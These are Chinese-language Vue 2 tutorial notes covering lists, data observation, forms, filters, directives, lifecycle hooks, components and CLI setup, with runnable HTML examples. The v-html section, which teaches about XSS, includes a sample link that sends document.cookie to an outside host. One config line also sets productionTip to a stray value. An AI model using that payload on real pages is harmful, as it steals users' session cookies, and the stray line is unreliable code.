  <ul>
    <li v-for="(p,index) of persons" :key="index">
      {{p.name}}-{{p.age}}
      <input type="text">
    </li>
  </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el: '#root',
        data: {
            persons: [
                { id: '001', name: '张三', age: 18 },
                { id: '002', name: '李四', age: 19 },
                { id: '003', name: '王五', age: 20 }
            ]
        },
        methods: {
            add() {
                const p = { id: '004', name: '老刘', age: 40 }
                this.persons.unshift(p)
            }
        },
    })
</script>
4

1.13.3.列表过滤

<title>列表过滤</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>人员列表</h2>
    <input type="text" placeholder="请输入名字" v-model="keyWord">
    <ul>
        <li v-for="(p,index) of filPersons" :key="p.id">
            {{ p.name }}-{{ p.age }}-{{ p.sex }}
        </li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    // 用 watch 实现
    // #region
    /* new Vue({
     el: '#root',
     data: {
      keyWord: '',
      persons: [
       { id: '001', name: '马冬梅', age: 19, sex: '女' },
       { id: '002', name: '周冬雨', age: 20, sex: '女' },
       { id: '003', name: '周杰伦', age: 21, sex: '男' },
       { id: '004', name: '温兆伦', age: 22, sex: '男' }
      ],
      filPersons: []
     },
     watch: {
      keyWord: {
       immediate: true,
       handler(val) {
        this.filPersons = this.persons.filter((p) => {
         return p.name.indexOf(val) !== -1
        })
       }
      }
     }
    }) */
    //#endregion

    // 用 computed 实现
    new Vue({
        el: '#root',
        data: {
            keyWord: '',
            persons: [
                { id: '001', name: '马冬梅', age: 19, sex: '' },
                { id: '002', name: '周冬雨', age: 20, sex: '' },
                { id: '003', name: '周杰伦', age: 21, sex: '' },
                { id: '004', name: '温兆伦', age: 22, sex: '' }
            ]
        },
        computed: {
            filPersons() {
                return this.persons.filter((p) => {
                    return p.name.indexOf(this.keyWord) !== -1
                })
            }
        }
    })
</script>
5

1.13.4.列表排序

<title>列表排序</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>人员列表</h2>
    <input type="text" placeholder="请输入名字" v-model="keyWord">
    <button @click="sortType = 2">年龄升序</button>
    <button @click="sortType = 1">年龄降序</button>
    <button @click="sortType = 0">原顺序</button>
    <ul>
        <li v-for="(p,index) of filPersons" :key="p.id">
            {{p.name}}-{{p.age}}-{{p.sex}}
            <input type="text">
        </li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el: '#root',
        data: {
            keyWord: '',
            sortType: 0, // 0原顺序 1降序 2升序
            persons: [
                { id: '001', name: '马冬梅', age: 30, sex: '' },
                { id: '002', name: '周冬雨', age: 31, sex: '' },
                { id: '003', name: '周杰伦', age: 18, sex: '' },
                { id: '004', name: '温兆伦', age: 19, sex: '' }
            ]
        },
        computed: {
            filPersons() {
                const arr = this.persons.filter((p) => {
                    return p.name.indexOf(this.keyWord) !== -1
                })
            //判断一下是否需要排序
                if (this.sortType) {
                    arr.sort((p1, p2) => {
                        return this.sortType === 1 ? p2.age - p1.age : p1.age - p2.age
                    })
                }
                return arr
            }
        }
    })
</script>
6

1.13.5.Vue 数据监视

更新时的一个问题:

this.persons[0] = {id:'001',name:'马老师',age:50,sex:'男'} 更改data数据,Vue不监听,模板不改变


<title>更新时的一个问题</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
  <h2>人员列表</h2>
  <button @click="updateMei">更新马冬梅的信息</button>
  <ul>
    <li v-for="(p,index) of persons" :key="p.id">
      {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
  </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    const vm = new Vue({
        el: '#root',
        data: {
            persons: [
                { id: '001', name: '马冬梅', age: 30, sex: '' },
                { id: '002', name: '周冬雨', age: 31, sex: '' },
                { id: '003', name: '周杰伦', age: 18, sex: '' },
                { id: '004', name: '温兆伦', age: 19, sex: '' }
            ]
        },
        methods: {
            updateMei() {
                // this.persons[0].name = '马老师' //奏效
                // this.persons[0].age = 50    //奏效
                // this.persons[0].sex = '男'   //奏效
                // this.persons[0] = {id:'001',name:'马老师',age:50,sex:'男'} //不奏效
                this.persons.splice(0, 1, { id: '001', name: '马老师', age: 50, sex: '' })
            }
        }
    })
</script>

模拟一个数据监测:

let data = {
    name: '尚硅谷',
    address: '北京',
}

function Observer(obj) {
    // 汇总对象中所有的属性形成一个数组
    const keys = Object.keys(obj)
    // 遍历
    keys.forEach((k) => {
        Object.defineProperty(this, k, {
            get() {
                return obj[k]
            },
            set(val) {
                console.log(`${k}被改了,我要去解析模板,生成虚拟DOM.....我要开始忙了`)
                obj[k] = val
            }
        })
    })
}

// 创建一个监视的实例对象,用于监视data中属性的变化
const obs = new Observer(data)
console.log(obs)

// 准备一个vm实例对象
let vm = {}
vm._data = data = obs

原理:

  1. vue会监视data中所有层次的数据
  2. 如何监测 对象 中的数据? 通过 setter 实现监视,且要在 new Vue() 时就传入要监测的数据
    • 对象创建后追加的属性,Vue默认不做响应式处理
    • 如需给后添加的属性做响应式,请使用如下API Vue.set(target,propertyName/index,value) vm.$set(target,propertyName/index,value)
  3. 如何监测 数组 中的数据? 通过包裹数组更新元素的方法实现,本质就是做了两件事 a. 调用原生对应的方法对数组进行更新 b. 重新解析模板,进而更新页面
  4. 在Vue修改数组中的某个元素一定要用如下方法 push()pop()unshift()shift()splice()sort()reverse()这几个方法被Vue重写了Vue.set()或vm.$set()

特别注意:Vue.set() 和 vm.$set() 不能给vm或vm的根数据对象(data等)添加属性.

<title>总结数据监视</title>
<style>button {margin-top: 10px;}</style>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h1>学生信息</h1>
    <button @click="student.age++">年龄+1岁</button> <br />
    <button @click="addSex">添加性别属性,默认值:男</button> <br />
    <button @click="student.sex = '未知' ">修改性别</button> <br />
    <button @click="addFriend">在列表首位添加一个朋友</button> <br />
    <button @click="updateFirstFriendName">修改第一个朋友的名字为:张三</button> <br />
    <button @click="addHobby">添加一个爱好</button> <br />
    <button @click="updateHobby">修改第一个爱好为:开车</button> <br />
    <button @click="removeSmoke">过滤掉爱好中的抽烟</button> <br />
    <h3>姓名:{{ student.name }}</h3>
    <h3>年龄:{{ student.age }}</h3>
    <h3 v-if="student.sex">性别:{{student.sex}}</h3>
    <h3>爱好:</h3>
    <ul>
        <li v-for="(h,index) in student.hobby" :key="index">{{ h }} </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
        <li v-for="(f,index) in student.friends" :key="index">{{ f.name }}--{{ f.age }}</li>
    </ul>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    const vm = new Vue({
        el: '#root',
        data: {
            student: {
                name: 'tom',
                age: 18,
                hobby: ['抽烟', '喝酒', '烫头'],
                friends: [
                    { name: 'jerry', age: 35 },
                    { name: 'tony', age: 36 }
                ]
            }
        },
        methods: {
            addSex() {
                // Vue.set(this.student,'sex','男')
                this.$set(this.student, 'sex', '')
            },
            addFriend() {
                this.student.friends.unshift({ name: 'jack', age: 70 })
            },
            updateFirstFriendName() {
                this.student.friends[0].name = '张三'
            },
            addHobby() {
                this.student.hobby.push('学习')
            },
            updateHobby() {
                // this.student.hobby.splice(0,1,'开车')
                // Vue.set(this.student.hobby,0,'开车')
                this.$set(this.student.hobby, 0, '开车')
            },
            removeSmoke() {
                this.student.hobby = this.student.hobby.filter((h) => {
                    return h !== '抽烟'
                })
            }
        }
    })
7

9.Vue核心 收集表单数据 过滤器


1.14.收集表单数据


收集表单数据

  • <input type="text"/> ,则v-model收集的是value值,用户输入的内容就是value值
  • <input type="radio"/> ,则v-model收集的是value值,且要给标签配置value属性
  • <input type="checkbox"/>
    • 没有配置 value 属性,那么收集的是 checked 属性(勾选 or 未勾选,是布尔值)
    • 配置了 value 属性
      • v-model 的初始值是 非数组 ,那么收集的就是 checked (勾选 or 未勾选,是布尔值)
      • v-model 的初始值是 数组 ,那么收集的就是 value 组成的数组

v-model 的三个修饰符

a. lazy 失去焦点后再收集数据 b. number输入字符串转为有效的数字 c. trim 输入首尾空格过滤


<title>收集表单数据</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <form @submit.prevent="demo">
        账号:<input type="text" v-model.trim="userInfo.account"> <br /><br />
        密码:<input type="password" v-model="userInfo.password"> <br /><br />
        年龄:<input type="number" v-model.number="userInfo.age"> <br /><br />
        性别:
<input type="radio" name="sex" v-model="userInfo.sex" value="male">
<input type="radio" name="sex" v-model="userInfo.sex" value="female"> <br /><br />
        爱好:
        学习<input type="checkbox" v-model="userInfo.hobby" value="study">
        打游戏<input type="checkbox" v-model="userInfo.hobby" value="game">
        吃饭<input type="checkbox" v-model="userInfo.hobby" value="eat">
        <br /><br />
        所属校区
        <select v-model="userInfo.city">
            <option value="">请选择校区</option>
            <option value="beijing">北京</option>
            <option value="shanghai">上海</option>
            <option value="shenzhen">深圳</option>
            <option value="wuhan">成都</option>
        </select>
        <br/><br/>
        其他信息:
        <textarea v-model.lazy="userInfo.other"></textarea> <br/><br/>
        <input type="checkbox" v-model="userInfo.agree">阅读并接受
        <a href="https://www.yuque.com/cessstudy">《用户协议》</a>
        <button>提交</button>
  </form>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    new Vue({
        el: '#root',
        data: {
            userInfo: {
                account: '',
                password: '',
                age: 18,
                sex: 'female',
                hobby: [],
                city: 'beijing',
                other: '',
                agree: ''
            }
        },
        methods: {
            demo() {
                console.log(JSON.stringify(this.userInfo))
            }
        }
    })
</script>
1

1.15.过滤器(Vue3 已经移除)


定义: 对要显示的数据进行特定格式化后再显示 (适用于一些简单逻辑的处理) 注册过滤器:

  • Vue.filter(name, callback) 全局过滤器
  • new Vue {filters: {}} 局部过滤器

使用过滤器:{{ xxx | 过滤器名}} 或 v-bind:属性 = "xxx | 过滤器名"

备注: a. 过滤器可以接收额外参数,多个过滤器也可以串联 b. 并没有改变原本的数据,而是产生新的对应的数据

处理时间的库 moment 体积较大 dayjs 轻量级

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <title>过滤器</title>
        <script type="text/javascript" src="../js/vue.js"></script>
        <script src="https://cdn.bootcdn.net/ajax/libs/dayjs/1.10.6/dayjs.min.js"></script>
    </head>
    <body>
        <div id="root">
            <h2>时间</h2>
            <h3>当前时间戳:{{time}}</h3>
            <h3>转换后时间:{{time | timeFormater()}}</h3>
            <h3>转换后时间:{{time | timeFormater('YYYY-MM-DD HH:mm:ss')}}</h3>
            <h3>截取年月日:{{time | timeFormater() | mySlice}}</h3>
        </div>
    </body>

    <script type="text/javascript">
        Vue.config.productionTip = false
        // 全局过滤器
        Vue.filter('mySlice',function(value){
            return value.slice(0,11)
        })
        new Vue({
            el:'#root',
            data:{
                time:1626750147900,
            },
            // 局部过滤器
            filters:{
                timeFormater(value, str="YYYY年MM月DD日 HH:mm:ss"){
                    return dayjs(value).format(str)
                }
            }
        })
    </script>
</html>
2

10.Vue核心 内置指令 自定义指令


1.16.内置指令


之前学过的指令:

v-bind 单向绑定解析表达式,可简写为: v-model 双向数据绑定 v-for 遍历数组 / 对象 / 字符串 v-on 绑定事件监听,可简写为@ v-show 条件渲染 (动态控制节点是否展示) v-if 条件渲染(动态控制节点是否存存在) v-else-if 条件渲染(动态控制节点是否存存在) v-else 条件渲染(动态控制节点是否存存在)


1.16.1.v-text 指令

v-text 指令

作用:向其所在的节点中渲染文本内容 与插值语法的区别:v-text 会替换掉节点中的内容,{{xxx}} 则不会,更灵活

<title>v-text指令</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <div>你好,{{name}}</div>
    <div v-text="name"></div>
    <div v-text="str"></div>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el:'#root',
        data:{
            name:'cess',
            str:'<h3>你好啊!</h3>'
        }
    })
</script>
1

1.16.2.v-html 指令

v-html 指令

作用:向指定节点中渲染包含html结构的内容 与插值语法的区别:

ⅰ. v-html会替换掉节点中所有的内容,{{xxx}}则不会 ⅱ. v-html可以识别html结构

严重注意v-html有安全性问题!!!

ⅰ. 在网站上动态渲染任意html是非常危险的,容易导致 XSS 攻击 ⅱ. 一定要在可信的内容上使用v-html,永远不要用在用户提交的内容上!!!


<title>v-html指令</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <div>你好,{{ name }}</div>
    <div v-html="str"></div>
    <div v-html="str2"></div>
</div>

<script type="text/javascript">
    Vue.config.productionTip = FontFaceSetLoadEvent
    new Vue({
        el:'#root',
        data:{
            name:'cess',
            str:'<h3>你好啊!</h3>',
            str2:'<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>兄弟我找到你想要的资源了,快来!</a>',
        }
    })
</script>
2

1.16.3.v-cloak 指令

v-cloak 指令(没有值)

a. 本质是一个特殊属性,Vue实例创建完毕并接管容器后,会删掉v-cloak属性 b. 使用css配合v-cloak可以解决网速慢时页面展示出{{xxx}}的问题

<title>v-cloak指令</title>

<style>
    [v-cloak] {
        display:none;
    }
</style>

<div id="root">
    <h2 v-cloak>{{ name }}</h2>
</div>

// 够延迟5秒收到vue.js
<script type="text/javascript" src="http://localhost:8080/resource/5s/vue.js"></script>

<script type="text/javascript">
    console.log(1)
    Vue.config.productionTip = false
    new Vue({
        el:'#root',
        data:{name:'cess'}
    })
</script>

1.16.4.v-once 指令

  • v-once 所在节点在初次动态渲染后,就视为静态内容了
  • 以后数据的改变不会引起 v-once 所在结构的更新,可以用于优化性能
<title>v-once指令</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2 v-once>初始化的n值是: {{n}}</h2>
    <h2>当前的n值是: {{n}}</h2>
    <button @click="n++">点我n+1</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({ el: '#root', data: {n:1} })
</script>
3

1.16.5.v-pre 指令

  1. 跳过 v-pre 所在节点的编译过程
  2. 可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译
<title>v-once指令</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2 v-once>初始化的n值是: {{n}}</h2>
    <h2>当前的n值是: {{n}}</h2>
    <button @click="n++">点我n+1</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({ el: '#root', data: {n:1} })
</script>
4

1.17.自定义指令


directives

定义语法:

  1. 局部指令

    new Vue({
        directives:{
            指令名:配置对象
        }
    })
    
    new Vue({
        directives:{
            指令名:回调函数
        }
    })
  2. 全局指令

    Vue.directive(指令名, 配置对象)
    
    Vue.directive(指令名, 回调函数)
    
    Vue.directive('fbind', {
        // 指令与元素成功绑定时(一上来)
        bind(element, binding) { // element就是DOM元素,binding就是要绑定的
            element.value = binding.value
        },
        // 指令所在元素被插入页面时
        inserted(element, binding) {
            element.focus()
        },
        // 指令所在的模板被重新解析时
        update(element, binding) {
            element.value = binding.value
        }
    })

配置对象中常用的3个回调函数:

bind(element, binding) 指令与元素成功绑定时调用 inserted(element, binding) 指令所在元素被插入页面时调用 update(element, binding) 指令所在模板结构被重新解析时调用 element 就是 DOM 元素, binding 就是要绑定的对象,它包含以下属性: name value oldValue expression arg modifiers

备注 a. 指令定义时不加 v- ,但使用时要加 v- b. 指令名如果是多个单词,要使用 kebab-case 命名方式,不要用 camelCase 命名

new Vue({
    el: '#root',
    data: {
        n:1
    },
    directives: {
        'big-number'(element,binding) {
            element.innerText = binding.value * 10
        }
    }
})

回顾一个DOM操作

<style>.demo{background-color: orange;}</style>

<body>
    <button id="btn">点我创建一个输入框</button>
</body>

<script type="text/javascript" >
    const btn = document.getElementById('btn')
    btn.onclick = ()=>{
        const input = document.createElement('input')

        input.className = 'demo'
        input.value = 99
        input.onclick = ()=>{alert(1)}

        document.body.appendChild(input)

        input.focus()
        input.parentElement.style.backgroundColor = 'skyblue'
    }
</script>
<title>自定义指令</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>{{ name }}</h2>
    <h2>当前的n值是:<span v-text="n"></span> </h2>
    <!-- <h2>放大10倍后的n值是:<span v-big-number="n"></span> </h2> -->
    <h2>放大10倍后的n值是:<span v-big="n"></span> </h2>
    <button @click="n++">点我n+1</button>
    <hr />
    <input type="text" v-fbind:value="n">
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    // 定义全局指令
    /* Vue.directive('fbind',{
    // 指令与元素成功绑定时(一上来)
    bind(element,binding){
        element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element,binding){
        element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element,binding){
        element.value = binding.value
    }
 }) */

    new Vue({
        el: '#root',
        data: {
            name: '尚硅谷',
            n: 1
        },
        directives: {
            // big函数何时会被调用?
            // 1.指令与元素成功绑定时(一上来) 2.指令所在的模板被重新解析时
            /* 'big-number'(element,binding){
                    // console.log('big')
                    element.innerText = binding.value * 10
                }, */
            big(element, binding) {
                console.log('big', this) // 🔴注意此处的 this 是 window
                // console.log('big')
                element.innerText = binding.value * 10
            },
            fbind: {
                // 指令与元素成功绑定时(一上来)
                bind(element, binding) {
                    element.value = binding.value
                },
                // 指令所在元素被插入页面时
                inserted(element, binding) {
                    element.focus()
                },
                // 指令所在的模板被重新解析时
                update(element, binding) {
                    element.value = binding.value
                }
            }
        }
    })
</script>
5

11.Vue核心 Vue生命周期


1.18.Vue生命周期


1.18.1.引出生命周期

生命周期:

  • a. 又名生 命周期回调函数 、生命周期函数、生命周期钩子
  • b. 是什么: Vue 在关键时刻帮我们调用的一些特殊名称的函数
  • c. 生命周期函数的名字不可更改 ,但函数的具体内容是程序员根据需求编写的
  • d. 生命周期函数中的 this 指向是 vm组件实例对象
<title>引出生命周期</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2 v-if="a">你好啊</h2>
    <h2 :style="{opacity}">看笔记学Vue</h2>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el: '#root',
        data: {
            a: false,
            opacity: 1
        },
        methods: {
        },
        // 🔴Vue 完成模板的解析并把初始的真实 DOM 元素放入页面后(挂载完毕)调用 mounted
        mounted() {
            console.log('mounted', this)
            setInterval(() => {
                this.opacity -= 0.01
                if(this.opacity <= 0) this.opacity = 1
            }, 16)
        },
    })

    // 通过外部的定时器实现(不推荐)
    // setInterval(() => {
    //   vm.opacity -= 0.01
    //   if(vm.opacity <= 0) vm.opacity = 1
    // },16)
</script>
1

1.18.2.分析生命周期

1
<title>分析生命周期</title>
    <script type="text/javascript" src="../js/vue.js"></script>

    <div id="root" :x="n">
        <h2 v-text="n"></h2>
        <h2>当前的n值是:{{ n }}</h2>
        <button @click="add">点我n+1</button>
        <button @click="bye">点我销毁vm</button>
    </div>

<script type="text/javascript">
    Vue.config.productionTip = false

    new Vue({
        el: '#root',
        // template:`
        //  <div>
        //   <h2>当前的n值是{{n}}</h2>
        //   <button @click="add">点我n+1</button>
        //  </div>
        // `,
        data: {
            n: 1
        },
        methods: {
            add() {
                console.log('add')
                this.n++
            },
            bye() {
                console.log('bye')
                this.$destroy()
            }
        },
        watch: {
            n() {
                console.log('n变了')
            }
        },
        beforeCreate() {console.log('beforeCreate')},
        created() {console.log('created')},
        beforeMount() {console.log('beforeMount')},
        mounted() {console.log('mounted')},
        beforeUpdate() {console.log('beforeUpdate')},
        updated() {console.log('updated')},
        beforeDestroy() {console.log('beforeDestroy')},
        destroyed() {console.log('destroyed')},
    })
</script>

1.18.3.总结生命周期

总结 常用的生命周期钩子

  • a. mounted发送ajax请求、启动定时器、绑定自定义事件、订阅消息等初始化操作
  • b. beforeDestroy清除定时器、解绑自定义事件、取消订阅消息等收尾工作

关于销毁Vue实例:

  • a. 销毁后借助Vue开发者工具看不到任何信息
  • b. 销毁后自定义事件会失效,但原生DOM事件依然有效
  • c. 一般不会在beforeDestroy操作数据,因为即便操作数据,也不会再触发更新流程了
<title>引出生命周期</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2 :style="{opacity}">欢迎学习Vue</h2>
    <button @click="opacity = 1">透明度设置为1</button>
    <button @click="stop">点我停止变换</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el: '#root',
        data: {
            opacity: 1
        },
        methods: {
            stop() {
                this.$destroy()
            }
        },
        // Vue完成模板的解析并把初始的真实DOM元素放入页面后(挂载完毕)调用mounted
        mounted() {
            console.log('mounted', this)
            this.timer = setInterval(() => {
                console.log('setInterval')
                this.opacity -= 0.01
                if (this.opacity <= 0) this.opacity = 1
            }, 16)
        },
        beforeDestroy() {
            clearInterval(this.timer)
            console.log('vm即将驾鹤西游了')
        },
    })
</script>
3

12.Vue组件化编程


2.1.模块与组件、模块化与组件化


1 2

模块:

a.理解:向外提供特定功能的 js 程序,一般就是一个 js 文件 b.为什么:js 文件很多很复杂 c.作用:复用、简化 js 的编写,提高 js 运行效率

组件:

a.定义:用来实现局部功能的代码和资源的集合(html/css/js/image…) b.为什么:一个界面的功能很复杂 c.作用:复用编码,简化项目编码,提高运行效率

模块化:

当应用中的 js 都以模块来编写的,那这个应用就是一个模块化的应用

组件化:

当应用中的功能都是多组件的方式来编写的,那这个应用就是一个组件化的应用


2.2.非单文件组件


非单文件组件:一个文件中包含有 n 个组件 单文件组件:一个文件中只包含有 1 个组件


2.2.1.基本使用

Vue 中使用组件的三大步骤

  1. 定义组件

    • 使用 Vue.extend(options) 创建,其中 optionsnew Vue(options) 时传入的 options 几乎一样,但也有点区别 a. el 不要写,因为最终所有的组件都要经过一个 vm 的管理,由 vm 中的 el 才决定服务哪个容器 b. data 必须写成函数,避免组件被复用时,数据存在引用关系
  2. 注册组件 a. 局部注册:new Vue() 的时候 options 传入 components 选项 b. 全局注册:Vue.component('组件名',组件)

  3. 使用组件 编写组件标签如 <school></school>

<title>基本使用</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>{{msg}}</h2><hr>
    <!-- 第三步:编写组件标签 -->
    <school></school><hr>
    <student></student><hr>
    <hello></hello><hr>
</div>

<div id="root2">
    <hello></hello>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    //第一步:创建school组件
    const school = Vue.extend({
        // el:'#root', //组件定义时,一定不要写el配置项,
        // 因为最终所有的组件都要被一个vm管理,由vm决定服务于哪个容器
        template: `
            <div class="demo">
                <h3>学校名称:{{schoolName}}</h3>
                <h3>学校地址:{{address}}</h3>
                <button @click="showName">点我提示学校名</button>
            </div>
        `,
        data() {
            return {
                schoolName: '尚硅谷',
                address: '北京昌平'
            }
        },
        methods: {
            showName() {
                alert(this.schoolName)
            }
        },
    })

    //第一步:创建student组件
    const student = Vue.extend({
        template: `
            <div>
                <h3>学生姓名:{{studentName}}</h3>
                <h3>学生年龄:{{age}}</h3>
            </div>
        `,
        data() {
            return {
                studentName: '张三',
                age: 18
            }
        }
    })

    //第一步:创建hello组件
    const hello = Vue.extend({
        template: `
            <div>
                <h3>你好啊!{{name}}</h3>
            </div>
        `,
        data() {
            return {
                name: 'cess'
            }
        }
    })

    //第二步:全局注册组件
    Vue.component('hello', hello)

    //创建vm
</script>
3

2.2.2.组件注意事项

关于组件名:

  • 一个单词组成
    • 第一种写法(首字母小写):school
    • 第二种写法 (首字母大写) :School
  • 多个单词组成
    • 第一种写法(kebab-case 命名):my-school
    • 第二种写法 (CamelCase 命名) :MySchool(需要Vue脚手架支持)
  • 备注
    • 组件名尽可能回避 HTML 中已有的元素名称,例如:h2、H2都不行
    • 可以使用 name 配置项指定组件在开发者工具中呈现的名字

关于组件标签:

  • 第一种写法: <school></school>
  • 第二种写法: <school/> (需要Vue脚手架支持)
  • 备注:不使用脚手架时, <school/> 会导致后续组件不能渲染

一个简写方式:const school = Vue.extend(options) 可简写为 const school = options ,因为父组件 components 引入的时候会自动创建

<title>几个注意点</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <h2>{{msg}}</h2>
    <school></school>
 </div>

<script type="text/javascript">
    Vue.config.productionTip = false

    //定义组件
    const school = Vue.extend({
        name: 'atguigu', // 组件给自己起个名字,用于在浏览器开发工具上显示
        template: `
            <div>
                <h3>学校名称:{{name}}</h3>
                <h3>学校地址:{{address}}</h3>
            </div>
        `,
        data() {
            return {
                name: '电子科技大学',
                address: '成都'
            }
        }
    })

    new Vue({
        el: '#root',
        data: {
            msg: '欢迎学习Vue!'
        },
        components: {
            school
        }
    })
</script>
4

2.2.3.组件的嵌套

5

<title>组件的嵌套</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root"></div>

<script type="text/javascript">
    Vue.config.productionTip = false

    //定义student组件
    const student = Vue.extend({
        name: 'student',
        template: `
            <div>
                <h4>学生姓名:{{name}}</h4>
                <h4>学生年龄:{{age}}</h4>
            </div>
        `,
        data() {return {name: '尚硅谷',age: 18}}
    })

    //定义school组件
    const school = Vue.extend({
        name: 'school',
        template: `
            <div>
                <h3>学校名称:{{name}}</h3>
                <h3>学校地址:{{address}}</h3>
                <student></student>
            </div>
        `,
        data() {return {name: '尚硅谷',address: '北京'}},
        //注册组件(局部)
        components: { student }
    })

    //定义hello组件
    const hello = Vue.extend({
        template: `<h3>{{msg}}</h3>`,
        data() {return {msg: '欢迎来到尚硅谷学习!'}}
    })

    //定义app组件
    const app = Vue.extend({
        template: `
            <div>
                <hello></hello>
                <school></school>
            </div>
        `,
        components: { school, hello }
    })

    //创建vm
    new Vue({
        el: '#root',
        template: '<app></app>',
        //注册组件(局部)
        components: { app }
    })
</script>
6

2.2.4.VueComponent

关于 VueComponent a. school 组件本质是一个名为 VueComponent的构造函数 ,且不是程序员定义的,而是 Vue.extend() 生成的 b. 我们只需要写 <school/><school></school>Vue 解析时会帮我们创建 school 组件的实例对象 ,即 Vue 帮我们执行的 new VueComponent(options) c. 每次调用 Vue.extend ,返回的都是一个全新的 VueComponent ,即不同组件是不同的对象 d. 关于 this 指向 ⅰ. 组件配置中 data 函数、 methods 中的函数、 watch 中的函数、 computed 中的函数 它们的 this 均是 VueComponent 实例对象 ⅱ. new Vue(options) 配置中:data 函数、 methods 中的函数、 watch 中的函数、 computed 中的函数 它们的 this 均是 Vue 实例对象 e. VueComponent 的实例对象,以后简称 vc (组件实例对象) Vue 的实例对象,以后简称 vm

<title>VueComponent</title>
<script type="text/javascript" src="../js/vue.js"></script>

<div id="root">
    <school></school>
    <hello></hello>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    // 定义school组件
    const school = Vue.extend({
        name: 'school',
        template: `
            <div>
                <h2>学校名称:{{name}}</h2>
                <h2>学校地址:{{address}}</h2>
                <button @click="showName">点我提示学校名</button>
            </div>
        `,
        data() {return {name: '尚硅谷',address: '北京'}},
        methods: {showName() {console.log('showName', this)}},
    })

    const test = Vue.extend({
        template: `<span>atguigu</span>`
    })

    // 定义hello组件
    const hello = Vue.extend({
        template: `
            <div>
                <h2>{{msg}}</h2>
                <test></test>
            </div>
        `,
        data() {return {msg: '你好啊!'}},
        components: { test }
    })

    // console.log('@',school)
    // console.log('#',hello)

    // 创建vm
    const vm = new Vue({
        el: '#root',
        components: { school, hello }
    })
</script>

2.2.5.一个重要的内置关系

7
  1. 一个重要的内置关系:VueComponent.prototype.proto === Vue.prototype
  2. 为什么要有这个关系:让组件实例对象vc可以访问到 Vue原型上的属性、方法

2.3.单文件组件


  • School.vue
<template>
    <div id='Demo'>
        <h2>学校名称:{{name}}</h2>
        <h2>学校地址:{{address}}</h2>
        <button @click="showName">点我提示学校名</button>
    </div>
</template>

<script>
    export default {
        name:'School',
        data() {
            return {
                name:'UESTC',
                address:'成都'
            }
        },
        methods: {
            showName(){
                alert(this.name)
            }
        },
    }
</script>

<style>
    #Demo{
        background: orange;
    }
</style>
  • Student.vue
<template>
    <div>
        <h2>学生姓名:{{name}}</h2>
        <h2>学生年龄:{{age}}</h2>
    </div>
</template>

<script>
    export default {
        name:'Student',
        data() {
            return {
                name:'cess',
                age:20
            }
        },
    }
</script>
  • App.vue
<template>
    <div>
        <School></School>
        <Student></Student>
    </div>
</template>

<script>
    import School from './School.vue'
    import Student from './Student.vue'

    export default {
        name:'App',
        components:{
            School,
            Student
        }
    }
</script>
  • main.js
import App from './App.vue'

new Vue({
    template:`<App></App>`,
    el:'#root',
    components:{App}
})
  • index.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>单文件组件练习</title>
</head>
<body>
    <div id="root"></div>
    <script src="../../js/vue.js"></script>
    <script src="./main.js"></script>
</body>
</html>

13.Vue CLI 初始化脚手架


3.1.初始化脚手架


3.1.1.说明

  1. Vue脚手架Vue 官方提供的标准化开发工具(开发平台)
  2. 最新的版本是 4.x
  3. 文档 Vue CLI

3.1.2.具体步骤

  1. 如果下载缓慢请配置 npm 淘宝镜像 npm config set registry http://registry.npm.taobao.org
  2. 全局安装 @vue/cli npm install -g @vue/cli
  3. 切换到创建项目的目录,使用命令创建项目 vue create xxx
  4. 选择使用 vue 的版本
  5. 启动项目 npm run serve
  6. 打包项目 npm run build
  7. 暂停项目 Ctrl+C

Vue脚手架隐藏了所有webpack相关的配置,若想查看具体的webpack配置,请执行 vue inspect > output.js


3.1.3.脚手架文件结构

.文件目录
├── node_modules
├── public
│   ├── favicon.ico: 页签图标
│   └── index.html: 主页面
├── src
│   ├── assets: 存放静态资源
│   │   └── logo.png
│   │── component: 存放组件
│   │   └── HelloWorld.vue
│   │── App.vue: 汇总所有组件
│   └── main.js: 入口文件
├── .gitignore: git版本管制忽略的配置
├── babel.config.js: babel的配置文件
├── package.json: 应用包配置文件
├── README.md: 应用描述文件
└── package-lock.json: 包版本控制文件

src/components/School.vue

<template>
    <div class="demo">
